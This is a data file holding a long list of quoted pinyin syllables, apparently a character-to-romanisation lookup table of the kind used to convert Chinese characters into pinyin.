"sang","chi","qiao","yan","dan","pen","can","li","yo","zha","wei","miao","ying","pen","bu","kui","xi","yu","jie","lou","ku","zao","hu","ti","yao","he","a","xiu","qiang","se","yong","su","hong","xie","ai","suo","ma","cha","hai","ke","da","sang","chen","ru","sou","wa","ji","pang","wu","qian","shi","ge","zi","jie","luo","weng","wa","si","chi","hao","suo",0,"hai","suo","qin","nie","he","zhi","sai","n","ge","na","dia","ai","qiang","tong","bi","ao","ao","lian","zui","zhe","mo","sou","sou","tan","di","qi","jiao","chong","jiao","kai","tan","shan","cao","jia","ai","xiao","piao","lou","ga","gu","xiao","hu","hui","guo","ou","xian","ze","chang","xu","po","de","ma","ma","hu","lei","du","ga","tang","ye","beng","ying","sai","jiao","mi","xiao","hua","mai",
"ran","chuai","peng","lao","xiao","ji","zhu","chao","kui","zui","xiao","si","hao","fu","liao","qiao","xi","chu","chan","dan","hei","xun","e","zun","fan","chi","hui","zan","chuang","cu","dan","yu","tun","ceng","jiao","ye","xi","qi","hao","lian","xu","deng","hui","yin","pu","jue","qin","xun","nie","lu","si","yan","ying","da","zhan","o","zhou","jin","nong","hui","xie","qi","e","zao","yi","shi","jiao","yuan","ai","yong","jue","kuai","yu","pen","dao","ga","hm","dun","dang","xin","sai","pi","pi","yin","zui","ning","di","lan","ta","huo","ru","hao","xia","ye","duo","pi","chou","ji","jin","hao","ti","chang","xun","me","ca","ti","lu","hui","bo","you","nie","yin","hu","me","hong","zhe","li","liu","hai","nang","xiao","mo","yan","li","lu","long","mo","dan","chen",
"pin","pi","xiang","huo","mo","xi","duo","ku","yan","chan","ying","rang","dian","la","ta","xiao","jue","chuo","huan","huo","zhuan","nie","xiao","ca","li","chan","chai","li","yi","luo","nang","za","su","xi","zen","jian","za","zhu","lan","nie","nang","lan","lo","wei","hui","yin","qiu","si","nin","jian","hui","xin","yin","nan","tuan","tuan","dun","kang","yuan","jiong","pian","yun","cong","hu","hui","yuan","e","guo","kun","cong","tong","tu","wei","lun","guo","qun","ri","ling","gu","guo","tai","guo","tu","you","guo","yin","hun","pu","yu","han","yuan","lun","quan","yu","qing","guo","chuan","wei","yuan","quan","ku","fu","yuan","yuan","ya","tu","tu","tu","tuan","lue","hui","yi","huan","luan","luan","tu","ya","tu","ting","sheng","pu","lu","kuai","ya","zai","wei","ge","yu","wu",
"gui","pi","yi","de","qian","qian","zhen","zhuo","dang","qia","xia","shan","kuang","chang","qi","nie","mo","ji","jia","zhi","zhi","ban","xun","yi","qin","mei","jun","rong","tun","fang","ben","ben","tan","kan","huai","zuo","keng","bi","jing","di","jing","ji","kuai","di","jing","jian","tan","li","ba","wu","fen","zhui","po","ban","tang","kun","qu","tan","zhi","tuo","gan","ping","dian","gua","ni","tai","pi","jiong","yang","fo","ao","lu","qiu","mu","ke","gou","xue","ba","chi","che","ling","zhu","fu","hu","zhi","chui","la","long","long","lu","ao","dai","pao","min","xing","dong","ji","he","lu","ci","chi","lei","gai","yin","hou","dui","zhao","fu","guang","yao","duo","duo","gui","cha","yang","yin","fa","gou","yuan","die","xie","ken","shang","shou","e","bing","dian","hong","ya",
"kua","da","ka","dang","kai","hang","nao","an","xing","xian","yuan","bang","fu","ba","yi","yin","han","xu","chui","qin","geng","ai","beng","fang","que","yong","jun","jia","di","mai","lang","juan","cheng","shan","jin","zhe","lie","lie","bu","cheng","hua","bu","shi","xun","guo","jiong","ye","nian","di","yu","bu","ya","quan","sui","pi","qing","wan","ju","lun","zheng","kong","chong","dong","dai","tan","an","cai","chu","beng","kan","zhi","duo","yi","zhi","yi","pei","ji","zhun","qi","sao","ju","ni","ku","ke","tang","kun","ni","jian","dui","jin","gang","yu","e","peng","gu","tu","leng","fang","ya","qian","kun","an","shen","duo","nao","tu","cheng","yin","hun","bi","lian","guo","die","zhuan","hou","bao","bao","yu","di","mao","jie","ruan","ye","geng","kan","zong","yu","huang","e",
"yao","yan","bao","ci","mei","chang","du","tuo","yin","feng","zhong","jie","jin","heng","gang","chun","jian","ping","lei","xiang","huang","leng","duan","wan","xuan","ji","ji","kuai","ying","ta","cheng","yong","kai","su","su","shi","mi","ta","weng","cheng","tu","tang","que","zhong","li","zhong","bang","sai","zang","dui","tian","wu","zheng","xun","ge","zhen","ai","gong","yan","kan","tian","yuan","wen","xie","liu","hai","lang","chang","peng","beng","chen","lu","lu","ou","qian","mei","mo","zhuan","shuang","shu","lou","chi","man","biao","jing","ce","shu","zhi","zhang","kan","yong","dian","chen","zhi","xi","guo","qiang","jin","di","shang","mu","cui","yan","ta","zeng","qian","qiang","liang","wei","zhui","qiao","zeng","xu","shan","shan","ba","pu","kuai","dong","fan","que","mo","dun","dun","zun","di","sheng","duo","duo",
"tan","deng","mu","fen","huang","tan","da","ye","zhu","jian","ao","qiang","ji","qiao","ken","yi","pi","bi","dian","jiang","ye","yong","xue","tan","lan","ju","huai","dang","rang","qian","xun","xian","xi","he","ai","ya","dao","hao","ruan","jin","lei","kuang","lu","yan","tan","wei","huai","long","long","rui","li","lin","rang","chan","xun","yan","lei","ba","wan","shi","ren","san","zhuang","zhuang","sheng","yi","mai","ke","zhu","zhuang","hu","hu","kun","yi","hu","xu","kun","shou","mang","zun","shou","yi","zhi","gu","chu","jiang","feng","bei","zhai","bian","sui","qun","ling","fu","cuo","xia","xiong","xie","nao","xia","kui","xi","wai","yuan","mao","su","duo","duo","ye","qing","wai","gou","gou","qi","meng","meng","yin","huo","chen","da","ze","tian","tai","fu","guai","yao","yang","hang","gao",
"shi","tao","tai","tou","yan","bi","yi","kua","jia","duo","hua","kuang","yun","jia","ba","en","lian","huan","di","yan","pao","juan","qi","nai","feng","xie","fen","dian","yang","kui","zou","huan","qi","kai","zha","ben","yi","jiang","tao","zang","ben","xi","huang","fei","diao","xun","beng","dian","ao","she","weng","ha","ao","wu","ao","jiang","lian","duo","yun","jiang","shi","fen","huo","bi","luan","duo","nu","nu","ding","nai","qian","jian","ta","jiu","nuan","cha","hao","xian","fan","ji","shuo","ru","fei","wang","hong","zhuang","fu","ma","dan","ren","fu","jing","yan","hai","wen","zhong","pa","du","ji","keng","zhong","yao","jin","yun","miao","fou","chi","yue","zhuang","niu","yan","na","xin","fen","bi","yu","tuo","feng","wan","fang","wu","yu","gui","du","ba","ni","zhou","zhuo","zhao",
"da","nai","yuan","tou","xian","zhi","e","mei","mo","qi","bi","shen","qie","e","he","xu","fa","zheng","min","ban","mu","fu","ling","zi","zi","shi","ran","shan","yang","man","jie","gu","si","xing","wei","zi","ju","shan","pin","ren","yao","dong","jiang","shu","ji","gai","xiang","hua","juan","jiao","gou","lao","jian","jian","yi","nian","zhi","ji","ji","xian","heng","guang","jun","kua","yan","ming","lie","pei","e","you","yan","cha","shen","yin","shi","gui","quan","zi","song","wei","hong","wa","lou","ya","rao","jiao","luan","ping","xian","shao","li","cheng","xie","mang","fu","suo","mei","wei","ke","chuo","chuo","ting","niang","xing","nan","yu","na","pou","nei","juan","shen","zhi","han","di","zhuang","e","pin","tui","xian","mian","wu","yan","wu","ai","yan","yu","si","yu","wa",
"li","xian","ju","qu","zhui","qi","xian","zhuo","dong","chang","lu","ai","e","e","lou","mian","cong","pou","ju","po","cai","ling","wan","biao","xiao","shu","qi","hui","fan","wo","rui","tan","fei","fei","jie","tian","ni","quan","jing","hun","jing","qian","dian","xing","hu","wan","lai","bi","yin","chou","nao","fu","jing","lun","an","lan","kun","yin","ya","ju","li","dian","xian","hua","hua","ying","chan","shen","ting","dang","yao","wu","nan","chuo","jia","tou","xu","yu","wei","di","rou","mei","dan","ruan","qin","hui","wo","qian","chun","miao","fu","jie","duan","yi","zhong","mei","huang","mian","an","ying","xuan","jie","wei","mei","yuan","zheng","qiu","shi","xie","tuo","lian","mao","ran","si","pian","wei","wa","jiu","hu","ao","qie","bao","xu","tou","gui","chu","yao","pi","xi",
"yuan","ying","rong","ru","chi","liu","mei","pan","ao","ma","gou","kui","qin","jia","sao","zhen","yuan","jie","rong","ming","ying","ji","su","niao","xian","tao","pang","lang","nao","bao","ai","pi","pin","yi","piao","yu","lei","xuan","man","yi","zhang","kang","yong","ni","li","di","gui","yan","jin","zhuan","chang","ze","han","nen","lao","mo","zhe","hu","hu","ao","nen","qiang","ma","pie","gu","wu","qiao","tuo","zhan","mao","xian","xian","mo","liao","lian","hua","gui","deng","zhi","xu","yi","hua","xi","kui","rao","xi","yan","chan","jiao","mei","fan","fan","xian","yi","hui","jiao","fu","shi","bi","shan","sui","qiang","lian","huan","xin","niao","dong","yi","can","ai","niang","ning","ma","tiao","chou","jin","ci","yu","pin","rong","ru","nai","yan","tai","ying","can","niao","yue","ying",
"mian","bi","ma","shen","xing","ni","du","liu","yuan","lan","yan","shuang","ling","jiao","niang","lan","qian","ying","shuang","hui","quan","mi","li","luan","yan","zhu","lan","zi","jie","jue","jue","kong","yun","ma","zi","cun","sun","fu","bei","zi","xiao","xin","meng","si","tai","bao","ji","gu","nu","xue","you","zhuan","hai","luan","sun","nao","mie","cong","qian","shu","can","ya","zi","ni","fu","zi","li","xue","bo","ru","nai","nie","nie","ying","luan","mian","ning","rong","ta","gui","zhai","qiong","yu","shou","an","tu","song","wan","rou","yao","hong","yi","jing","zhun","mi","zhu","dang","hong","zong","guan","zhou","ding","wan","yi","bao","shi","shi","chong","shen","ke","xuan","shi","you","huan","yi","tiao","shi","xian","gong","cheng","qun","gong","xiao","zai","zha","bao","hai","yan","xiao",
"jia","shen","chen","rong","huang","mi","kou","kuan","bin","su","cai","zan","ji","yuan","ji","yin","mi","kou","qing","que","zhen","jian","fu","ning","bing","huan","mei","qin","han","yu","shi","ning","jin","ning","zhi","yu","bao","kuan","ning","qin","mo","cha","ju","gua","qin","hu","wu","liao","shi","ning","zhai","shen","wei","xie","kuan","hui","liao","jun","huan","yi","yi","bao","qin","chong","bao","feng","cun","dui","si","xun","dao","lu","dui","shou","po","feng","zhuan","fu","she","ke","jiang","jiang","zhuan","wei","zun","xun","shu","dui","dao","xiao","jie","shao","er","er","er","ga","jian","shu","chen","shang","shang","mo","ga","chang","liao","xian","xian","kun","you","wang","you","liao","liao","yao","mang","wang","wang","wang","ga","yao","duo","kui","zhong","jiu","gan","gu","gan","tui","gan",
"gan","shi","yin","chi","kao","ni","jin","wei","niao","ju","pi","ceng","xi","bi","ju","jie","tian","qu","ti","jie","wu","diao","shi","shi","ping","ji","xie","zhen","xie","ni","zhan","xi","wei","man","e","lou","ping","ti","fei","shu","xie","tu","lu","lu","xi","ceng","lu","ju","xie","ju","jue","liao","jue","shu","xi","che","tun","ni","shan","wa","xian","li","e","dao","hui","long","yi","qi","ren","wu","han","shen","yu","chu","sui","qi","ren","yue","ban","yao","ang","ya","wu","jie","e","ji","qian","fen","wan","qi","cen","qian","qi","cha","jie","qu","gang","xian","ao","lan","dao","ba","zuo","zuo","yang","ju","gang","ke","gou","xue","po","li","tiao","qu","yan","fu","xiu","jia","ling","tuo","pi","ao","dai","kuang","yue","qu","hu","po","min",
"an","tiao","ling","chi","ping","dong","han","kui","xiu","mao","tong","xue","yi","bian","he","ba","luo","e","fu","xun","die","lu","en","er","gai","quan","dong","yi","mu","shi","an","wei","huan","zhi","mi","li","ji","tong","wei","you","gu","xia","li","yao","jiao","zheng","luan","jiao","e","e","yu","xie","bu","qiao","qun","feng","feng","nao","li","you","xian","hong","dao","shen","cheng","tu","geng","jun","hao","xia","yin","yu","lang","kan","lao","lai","xian","que","kong","chong","chong","ta","lin","hua","ju","lai","qi","min","kun","kun","zu","gu","cui","ya","ya","gang","lun","lun","leng","jue","duo","zheng","guo","yin","dong","han","zheng","wei","xiao","pi","yan","song","jie","beng","zu","ku","dong","zhan","gu","yin","zi","ze","huang","yu","wai","yang","feng","qiu","yang",
"ti","yi","zhi","shi","zai","yao","e","zhu","kan","lu","yan","mei","han","ji","ji","huan","ting","sheng","mei","qian","wu","yu","zong","lan","ke","yan","yan","wei","zong","cha","sui","rong","ke","qin","yu","ti","lou","tu","dui","xi","weng","cang","dang","rong","jie","kai","liu","wu","song","qiao","zi","wei","beng","dian","cuo","qian","yong","nie","cuo","ji","shi","ruo","song","zong","jiang","liao","kang","chan","die","cen","ding","tu","lou","zhang","zhan","zhan","ao","cao","qu","qiang","cui","zui","dao","dao","xi","yu","pei","long","xiang","ceng","bo","qin","jiao","yan","lao","zhan","lin","liao","liao","jin","deng","duo","zun","jiao","gui","yao","jiao","yao","jue","zhan","yi","xue","nao","ye","ye","yi","nie","xian","ji","xie","ke","xi","di","ao","zui","wei","yi","rong","dao",
"ling","za","yu","yue","yin","ru","jie","li","gui","long","long","dian","rong","xi","ju","chan","ying","kui","yan","wei","nao","quan","chao","cuan","luan","dian","dian","nie","yan","yan","yan","kui","yan","chuan","kuai","chuan","zhou","huang","jing","xun","chao","chao","lie","gong","zuo","qiao","ju","gong","ju","wu","pu","pu","cha","qiu","qiu","ji","yi","si","ba","zhi","zhao","xiang","yi","jin","xun","juan","ba","xun","jin","fu","za","bi","shi","bu","ding","shuai","fan","nie","shi","fen","pa","zhi","xi","hu","dan","wei","zhang","tang","dai","mo","pei","pa","tie","bo","lian","zhi","zhou","bo","zhi","di","mo","yi","yi","ping","qia","juan","ru","shuai","dai","zheng","shui","qiao","zhen","shi","qun","xi","bang","dai","gui","chou","ping","zhang","san","wan","dai","wei","chang","sha","qi",
"ze","guo","mao","du","hou","zheng","xu","mi","wei","wo","fu","yi","bang","ping","die","gong","pan","huang","tao","mi","jia","teng","hui","zhong","shan","man","mu","biao","guo","ze","mu","bang","zhang","jing","chan","fu","zhi","hu","fan","chuang","bi","bi","zhang","mi","qiao","chan","fen","meng","bang","chou","mie","chu","jie","xian","lan","gan","ping","nian","jian","bing","bing","xing","gan","yao","huan","you","you","ji","guang","pi","ting","ze","guang","zhuang","mo","qing","bi","qin","dun","chuang","gui","ya","bai","jie","xu","lu","wu","zhuang","ku","ying","di","pao","dian","ya","miao","geng","ci","fu","tong","pang","fei","xiang","yi","zhi","tiao","zhi","xiu","du","zuo","xiao","tu","gui","ku","mang","ting","you","bu","bing","cheng","lai","bi","ji","an","shu","kang","yong","tuo","song","shu",
"qing","yu","yu","miao","sou","ce","xiang","fei","jiu","e","gui","liu","sha","lian","lang","sou","zhi","pou","qing","jiu","jiu","jin","ao","kuo","lou","yin","liao","dai","lu","yi","chu","chan","tu","si","xin","miao","chang","wu","fei","guang","ku","kuai","bi","qiang","xie","lin","lin","liao","lu","ji","ying","xian","ting","yong","li","ting","yin","xun","yan","ting","di","pai","jian","hui","nai","hui","gong","nian","kai","bian","yi","qi","nong","fen","ju","yan","yi","zang","bi","yi","yi","er","san","shi","er","shi","shi","gong","diao","yin","hu","fu","hong","wu","tui","chi","jiang","ba","shen","di","zhang","jue","tao","fu","di","mi","xian","hu","chao","nu","jing","zhen","yi","mi","quan","wan","shao","ruo","xuan","jing","diao","zhang","jiang","qiang","peng","dan","qiang","bi","bi",
"she","dan","jian","gou","ge","fa","bi","kou","jian","bie","xiao","dan","guo","jiang","hong","mi","guo","wan","jue","ji","ji","gui","dang","lu","lu","tuan","hui","zhi","hui","hui","yi","yi","yi","yi","yue","yue","shan","xing","wen","tong","yan","yan","yu","chi","cai","biao","diao","bin","peng","yong","piao","zhang","ying","chi","chi","zhuo","tuo","ji","fang","zhong","yi","wang","che","bi","di","ling","fu","wang","zheng","cu","wang","jing","dai","xi","xun","hen","yang","huai","lu","hou","wang","cheng","zhi","xu","jing","tu","cong","zhi","lai","cong","de","pai","xi","dong","ji","chang","zhi","cong","zhou","lai","yu","xie","jie","jian","shi","jia","bian","huang","fu","xun","wei","pang","yao","wei","xi","zheng","piao","ti","de","zheng","zheng","bie","de","chong","che","jiao","hui","jiao","hui",
"mei","long","xiang","bao","qu","xin","xin","bi","yi","le","ren","dao","ding","gai","ji","ren","ren","chan","tan","te","te","gan","qi","shi","cun","zhi","wang","mang","xi","fan","ying","tian","min","wen","zhong","chong","wu","ji","wu","xi","jia","you","wan","cong","song","kuai","yu","bian","zhi","qi","cui","chen","tai","tun","qian","nian","hun","xiong","niu","kuang","xian","xin","kang","hu","kai","fen","huai","tai","song","wu","ou","chang","chuang","ju","yi","bao","chao","min","pei","zuo","zen","yang","ju","ban","nu","nao","zheng","pa","bu","tie","hu","hu","ju","da","lian","si","chou","di","dai","yi","tu","you","fu","ji","peng","xing","yuan","ni","guai","fu","xi","bi","you","qie","xuan","cong","bing","huang","xu","chu","bi","shu","xi","tan","yong","zong","dui","mo","zhi",
"yi","shi","nen","xun","shi","xi","lao","heng","kuang","mou","zhi","xie","lian","tiao","huang","die","hao","kong","gui","heng","xi","jiao","shu","si","hu","qiu","yang","hui","hui","chi","jia","yi","xiong","guai","lin","hui","zi","xu","chi","shang","nu","hen","en","ke","dong","tian","gong","quan","xi","qia","yue","peng","ken","de","hui","e","xiao","tong","yan","kai","ce","nao","yun","mang","yong","yong","yuan","pi","kun","qiao","yue","yu","tu","jie","xi","zhe","lin","ti","han","hao","qie","ti","bu","yi","qian","hui","xi","bei","man","yi","heng","song","quan","cheng","kui","wu","wu","you","li","liang","huan","cong","yi","yue","li","nin","nao","e","que","xuan","qian","wu","min","cong","fei","bei","duo","cui","chang","men","san","ji","guan","guan","xing","dao","qi","kong","tian",
"lun","xi","kan","gun","ni","qing","chou","dun","guo","zhan","jing","wan","yuan","jin","ji","lan","yu","huo","he","quan","tan","ti","ti","nie","wang","chuo","hu","hun","xi","chang","xin","wei","hui","e","suo","zong","jian","yong","dian","ju","can","cheng","de","bei","qie","can","dan","guan","duo","nao","yun","xiang","zhui","die","huang","chun","qiong","re","xing","ce","bian","min","zong","ti","qiao","chou","bei","xuan","wei","ge","qian","wei","yu","yu","bi","xuan","huan","min","bi","yi","mian","yong","kai","dang","yin","e","chen","mao","qia","ke","yu","ai","qie","yan","nuo","gan","yun","zong","sai","leng","fen","ying","kui","kui","que","gong","yun","su","su","qi","yao","song","huang","ji","gu","ju","chuang","ni","xie","kai","zheng","yong","cao","xun","shen","bo","kai","yuan","xi",
"hun","yong","yang","li","sao","tao","yin","ci","xu","qian","tai","huang","yun","shen","ming","gong","she","cong","piao","mu","mu","guo","chi","can","can","can","cui","min","te","zhang","tong","ao","shuang","man","guan","que","zao","jiu","hui","kai","lian","ou","song","qin","yin","lu","shang","wei","tuan","man","qian","she","yong","qing","kang","di","zhi","lou","juan","qi","qi","yu","ping","liao","cong","you","chong","zhi","tong","cheng","qi","qu","peng","bei","bie","qiong","jiao","zeng","chi","lian","ping","kui","hui","qiao","cheng","yin","yin","xi","xi","dan","tan","duo","dui","dui","su","jue","ce","xiao","fan","fen","lao","lao","chong","han","qi","xian","min","jing","liao","wu","can","jue","cu","xian","tan","sheng","pi","yi","chu","xian","nao","dan","tan","jing","song","han","jiao","wei","xuan",
"dong","qin","qin","ju","cao","ken","xie","ying","ao","mao","yi","lin","se","jun","huai","men","lan","ai","lin","yan","kuo","xia","chi","yu","yin","dai","meng","ai","meng","dui","qi","mo","lan","men","chou","zhi","nuo","nuo","yan","yang","bo","zhi","kuang","kuang","you","fu","liu","mie","cheng","hui","chan","meng","lan","huai","xuan","rang","chan","ji","ju","huan","she","yi","lian","nan","mi","tang","jue","gang","gang","zhuang","ge","yue","wu","jian","xu","shu","rong","xi","cheng","wo","jie","ge","jian","qiang","huo","qiang","zhan","dong","qi","jia","die","zei","jia","ji","zhi","kan","ji","kui","gai","deng","zhan","qiang","ge","jian","jie","yu","jian","yan","lu","hu","zhan","xi","xi","chuo","dai","qu","hu","hu","hu","e","shi","ti","mao","hu","li","fang","suo","bian","dian",
"jiong","shang","yi","yi","shan","hu","fei","yan","shou","shou","cai","zha","qiu","le","pu","ba","da","reng","fan","ru","zai","tuo","zhang","diao","kang","yu","ku","gan","shen","cha","tuo","gu","kou","wu","den","qian","zhi","ren","kuo","men","sao","yang","niu","ban","che","rao","xi","qian","ban","jia","yu","fu","ao","xi","pi","zhi","zhi","e","den","zhao","cheng","ji","yan","kuang","bian","chao","ju","wen","hu","yue","jue","ba","qin","dan","zheng","yun","wan","ne","yi","shu","zhua","pou","tou","dou","kang","zhe","pou","fu","pao","ba","ao","ze","tuan","kou","lun","qiang","yun","hu","bao","bing","zhi","peng","tan","bu","pi","tai","yao","zhen","zha","yang","bao","he","ni","ye","di","chi","pi","jia","mo","mei","chen","ya","chou","qu","min","chu","jia","fu","zha",
"zhu","dan","chai","mu","nian","la","fu","pao","ban","pai","lin","na","guai","qian","ju","ta","ba","tuo","tuo","ao","ju","zhuo","pan","zhao","bai","bai","di","ni","ju","kuo","long","jian","qia","yong","lan","ning","bo","ze","qian","hen","kuo","shi","jie","zheng","nin","gong","gong","quan","shuan","cun","za","kao","yi","xie","ce","hui","pin","zhuai","shi","na","bai","chi","gua","zhi","kuo","duo","duo","zhi","qie","an","nong","zhen","ge","jiao","kua","dong","na","tiao","lie","zha","lu","die","wa","jue","lie","ju","zhi","luan","ya","wo","ta","xie","nao","dang","jiao","zheng","ji","hui","xian","yu","ai","tuo","nuo","cuo","bo","geng","ti","zhen","cheng","sa","sa","keng","mei","long","ju","peng","jian","yi","ting","shan","rua","wan","xie","cha","feng","jiao","wu","jun","jiu",
"tong","kun","huo","tu","zhuo","pou","lu","ba","han","shao","nie","juan","ze","shu","ye","jue","bu","wan","bu","zun","yi","zhai","lu","sou","tuo","lao","sun","bang","jian","huan","dao","wei","wan","qin","peng","she","lie","min","men","fu","bai","ju","dao","wo","ai","juan","yue","zong","chen","chui","jie","tu","ben","na","nian","ruo","zuo","wo","xi","xian","cheng","dian","sao","lun","qing","gang","duo","shou","diao","pou","di","zhang","hun","ji","tao","qia","qi","pai","shu","qian","ling","ye","ya","jue","zheng","liang","gua","yi","huo","shan","zheng","e","cai","tan","che","bing","jie","ti","kong","tui","yan","cuo","zhou","ju","tian","qian","ken","bai","pa","jie","lu","guai","ming","geng","zhi","dan","meng","can","sao","guan","peng","yuan","nuo","jian","zheng","jiu","jian","yu","yan",
"kui","nan","hong","rou","pi","wei","sai","zou","xuan","miao","ti","nie","cha","shi","zong","zhen","yi","xun","yong","bian","yang","huan","yan","zan","an","xu","ya","wo","ke","chuai","ji","ti","la","la","chen","kai","jiu","jiu","tu","jie","hui","gen","chong","xiao","die","xie","yuan","qian","ye","cha","zha","bei","yao","wei","beng","lan","wen","qin","chan","ge","lou","zong","geng","jiao","gou","qin","rong","que","chou","chuai","zhan","sun","sun","bo","chu","rong","bang","cuo","sao","ke","yao","dao","zhi","nu","la","jian","sou","qiu","gao","xian","shuo","sang","jin","mie","e","chui","nuo","shan","ta","zha","tang","pan","ban","da","li","tao","hu","zhi","wa","hua","qian","wen","qiang","tian","zhen","e","xie","nuo","quan","cha","zha","ge","wu","en","she","kang","she","shu","bai",
"yao","bin","sou","tan","sa","chan","suo","jiu","chong","chuang","guai","bing","feng","shuai","di","qi","sou","zhai","lian","cheng","chi","guan","lu","luo","lou","zong","gai","hu","zha","chuang","tang","hua","cui","nai","mo","jiang","gui","ying","zhi","ao","zhi","nie","man","chan","kou","chu","she","tuan","jiao","mo","mo","zhe","can","keng","biao","jiang","yin","gou","qian","liao","ji","ying","jue","pie","pie","lao","dun","xian","ruan","gui","zan","yi","xian","cheng","cheng","sa","nao","hong","si","han","guang","da","zun","nian","lin","zheng","hui","zhuang","jiao","ji","cao","dan","dan","che","bo","che","jue","fu","liao","ben","fu","qiao","bo","cuo","zhuo","zhuan","wei","pu","qin","dun","nian","hua","xie","lu","jiao","cuan","ta","han","qiao","wo","jian","gan","yong","lei","nang","lu","shan","zhuo","ze",
"pu","chuo","ji","dang","se","cao","qing","qing","huan","jie","qin","kuai","dan","xie","ka","pi","bai","ao","ju","ye","e","meng","sou","mi","ji","tai","zhuo","dao","xing","lan","ca","ju","ye","ru","ye","ye","ni","wo","ji","bin","ning","ge","zhi","zhi","kuo","mo","jian","xie","lie","tan","bai","sou","lu","lue","rao","ti","pan","yang","lei","ca","shu","zan","nian","xian","jun","huo","li","la","huan","ying","lu","long","qian","qian","zan","qian","lan","xian","ying","mei","rang","chan","ying","cuan","xie","she","luo","jun","mi","li","zan","luan","tan","zuan","li","dian","wa","dang","jiao","jue","lan","li","nang","zhi","gui","gui","qi","xun","pu","pu","shou","kao","you","gai","yi","gong","gan","ban","fang","zheng","po","dian","kou","min","wu","gu","he","ce","xiao",
"mi","chu","ge","di","xu","jiao","min","chen","jiu","shen","duo","yu","chi","ao","bai","xu","jiao","duo","lian","nie","bi","chang","dian","duo","yi","gan","san","ke","yan","dun","ji","tou","xiao","duo","jiao","jing","yang","xia","min","shu","ai","qiao","ai","zheng","di","zhen","fu","shu","liao","qu","xiong","yi","jiao","shan","jiao","zhuo","yi","lian","bi","li","xiao","xiao","wen","xue","qi","qi","zhai","bin","jue","zhai","lang","fei","ban","ban","lan","yu","lan","wei","dou","sheng","liao","jia","hu","xie","jia","yu","zhen","jiao","wo","tiao","dou","jin","chi","yin","fu","qiang","zhan","qu","zhuo","zhan","duan","cuo","si","xin","zhuo","zhuo","qin","lin","zhuo","chu","duan","zhu","fang","chan","hang","yu","shi","pei","you","mei","pang","qi","zhan","mao","lu","pei","pi","liu","fu",
"fang","xuan","jing","jing","ni","zu","zhao","yi","liu","shao","jian","yu","yi","qi","zhi","fan","piao","fan","zhan","kuai","sui","yu","wu","ji","ji","ji","huo","ri","dan","jiu","zhi","zao","xie","tiao","xun","xu","ga","la","gan","han","tai","di","xu","chan","shi","kuang","yang","shi","wang","min","min","tun","chun","wu","yun","bei","ang","ze","ban","jie","kun","sheng","hu","fang","hao","gui","chang","xuan","ming","hun","fen","qin","hu","yi","xi","xin","yan","ze","fang","tan","shen","ju","yang","zan","bing","xing","ying","xuan","po","zhen","ling","chun","hao","mei","zuo","mo","bian","xu","hun","zhao","zong","shi","shi","yu","fei","die","mao","ni","chang","wen","dong","ai","bing","ang","zhou","long","xian","kuang","tiao","chao","shi","huang","huang","xuan","kui","xu","jiao","jin","zhi",
"jin","shang","tong","hong","yan","gai","xiang","shai","xiao","ye","yun","hui","han","han","jun","wan","xian","kun","zhou","xi","cheng","sheng","bu","zhe","zhe","wu","han","hui","hao","chen","wan","tian","zhuo","zui","zhou","pu","jing","xi","shan","ni","xi","qing","qi","jing","gui","zheng","yi","zhi","an","wan","lin","liang","chang","wang","xiao","zan","fei","xuan","geng","yi","xia","yun","hui","xu","min","kui","ye","ying","shu","wei","shu","qing","mao","nan","jian","nuan","an","yang","chun","yao","suo","jin","ming","jiao","kai","gao","weng","chang","qi","hao","yan","li","ai","ji","ji","men","zan","xie","hao","mu","mo","cong","ni","zhang","hui","bao","han","xuan","chuan","liao","xian","dan","jing","pie","lin","tun","xi","yi","ji","huang","dai","ye","ye","li","tan","tong","xiao","fei","shen",
"zhao","hao","yi","xiang","xing","shen","jiao","bao","jing","yan","ai","ye","ru","shu","meng","xun","yao","pu","li","chen","kuang","die","liao","yan","huo","lu","xi","rong","long","nang","luo","luan","shai","tang","yan","zhu","yue","yue","qu","ye","geng","ye","hu","he","shu","cao","cao","sheng","man","ceng","ceng","ti","zui","can","xu","hui","yin","qie","fen","pi","yue","you","ruan","peng","fen","fu","ling","fei","qu","ti","nu","tiao","shuo","zhen","lang","lang","zui","ming","huang","wang","tun","chao","ji","qi","ying","zong","wang","tong","lang","lao","meng","long","mu","deng","wei","mo","ben","zha","shu","shu","mu","zhu","ren","ba","pu","duo","duo","dao","li","gui","ji","jiu","bi","xiu","cheng","ci","sha","ru","za","quan","qian","yu","gan","wu","cha","shan","xun","fan","wu",
"zi","li","xing","cai","cun","ren","biao","tuo","di","zhang","mang","chi","yi","gai","gong","du","li","qi","shu","gang","tiao","jiang","shan","wan","lai","jiu","mang","yang","ma","miao","si","yuan","hang","fei","bei","jie","dong","gao","yao","xian","chu","chun","pa","shu","hua","xin","chou","zhu","chou","song","ban","song","ji","wo","jin","gou","ji","mao","pi","bi","wang","ang","fang","fen","yi","fu","nan","xi","hu","ya","dou","xin","zhen","yao","lin","rui","e","mei","zhao","guo","zhi","cong","yun","zui","dou","shu","zao","duo","li","lu","jian","cheng","song","qiang","feng","nan","xiao","xian","ku","ping","tai","xi","zhi","guai","xiao","jia","jia","gou","bao","mo","yi","ye","ye","shi","nie","bi","duo","yi","ling","bing","ni","la","he","ban","fan","zhong","dai","ci","yang",
"fu","bai","mou","gan","qi","ran","rou","mao","shao","song","zhe","xia","you","shen","gui","tuo","zha","nan","ning","yong","di","zhi","zha","cha","dan","gu","bu","jiu","ao","fu","jian","ba","duo","ke","nai","zhu","bi","liu","chai","shan","si","chu","pei","shi","guai","zha","yao","cheng","jiu","shi","zhi","liu","mei","li","rong","zha","zao","biao","zhan","zhi","long","dong","lu","sheng","li","lan","yong","shu","xun","shuan","qi","zhen","qi","li","yi","xiang","zhen","li","se","gua","kan","ben","ren","xiao","bai","ren","bing","zi","chou","yi","ci","xu","zhu","jian","zui","er","er","you","fa","gong","kao","lao","zhan","lie","yin","yang","he","gen","yi","shi","ge","zai","luan","fu","jie","heng","gui","tao","guang","wei","kuang","ru","an","an","juan","yi","zhuo","ku","zhi",
